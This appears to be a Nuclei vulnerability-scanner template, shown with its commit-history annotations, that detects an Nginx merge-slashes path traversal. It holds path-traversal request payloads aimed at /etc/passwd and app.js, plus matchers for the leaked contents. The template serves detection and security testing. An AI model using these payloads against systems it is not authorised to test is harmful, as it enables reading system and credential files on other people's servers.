nuclei-templates/vulnerabilities/other/nginx-merge-slashes-path-tr...

id: nginx-merge-slashes-path-traversal

info:
  name: Nginx Merge Slashes Path Traversal
  author: dhiyaneshDk
  severity: medium
  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
  tags: exposure,config

requests:
  - method: GET
    path:
      - "{{BaseURL}}//////../../../etc/passwd"
      - "{{BaseURL}}/static//////../../../../etc/passwd"
      - "{{BaseURL}}///../app.js"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:"
          - "app.listen"
        part: body
        condition: or

      - type: status
        status:
          - 200
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`id: nginx-merge-slashes-path-traversal`

			`info:`
			`name: Nginx Merge Slashes Path Traversal`
			`author: dhiyaneshDk`
			`severity: medium`
			`reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json`
			`tags: exposure,config`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}//////../../../etc/passwd"`
			`- "{{BaseURL}}/static//////../../../../etc/passwd"`
			`- "{{BaseURL}}///../app.js"`
Update vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml Co-authored-by: Toufik Airane <toufik.airane@appsectribe.com> 2021-07-23 18:55:13 +00:00
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "root:"`
			`- "app.listen"`
			`part: body`
Update vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml Co-authored-by: Toufik Airane <toufik.airane@appsectribe.com> 2021-07-23 18:54:37 +00:00			`condition: or`

Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`- type: status`
			`status:`
			`- 200`